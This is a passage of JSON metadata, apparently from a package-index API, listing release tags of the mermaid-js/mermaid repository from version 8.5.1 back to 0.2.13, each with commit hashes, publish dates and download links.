api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/ho